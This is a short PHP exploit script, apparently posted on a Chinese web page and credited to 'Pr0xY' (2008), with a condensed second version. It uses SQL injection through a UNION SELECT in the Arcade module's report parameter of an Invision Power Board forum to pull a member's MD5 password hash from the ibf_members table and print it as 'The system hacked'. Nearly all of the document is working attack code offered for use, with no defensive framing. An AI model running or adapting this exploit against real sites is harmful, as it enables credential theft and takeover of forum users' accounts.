|
<pre>
<?php
/**
* @author Pr0xY
* @copyright 2008
*/
class Injection
{
var $inject;
var $Asite;
var $Isite;
function Injection($address, $id)
{
$this->inject = "index.php?act=Arcade&module=report&user=-{$id}%20union%20select%20password%20from%20ibf_members%20where%20id={$id}";
$this->Asite = $address;
}
function getTheHash()
{
$html = file_get_contents($this->Asite.$this->inject);
preg_match_all('/(colspan=\"5\"\>)(.*)(\S*)(\S*)/',$html, $hash);
$md5 = preg_replace("/[^a-zA-Z0-9]/", "", $hash[2][0]);
$md5 = preg_replace("/(\S{32})(td)/", "$1", $md5);
if(strlen($md5) == 32)
echo "The system hacked : <b>{$md5}</b>";
else
echo "Error";
}
}
$y0n1 = new Injection("", 1);
$y0n1->getTheHash();
?>
</pre>
The short code :
$a = "";
$i = 1;
$inject = "index.php?act=Arcade&module=report&user=-{$i}%20union%20select%20password%20from%20ibf_members%20where%20id={$i}";
$html = file_get_contents($a.$inject);
preg_match_all('/(colspan=\"5\"\>)(.*)(\S*)(\S*)/',$html, $hash);
$md5 = preg_replace("/[^a-zA-Z0-9]/", "", $hash[2][0]);
$md5 = preg_replace("/(\S{32})(td)/", "$1", $md5);
echo $md5;
|
| |
|
推荐
评论(0条)
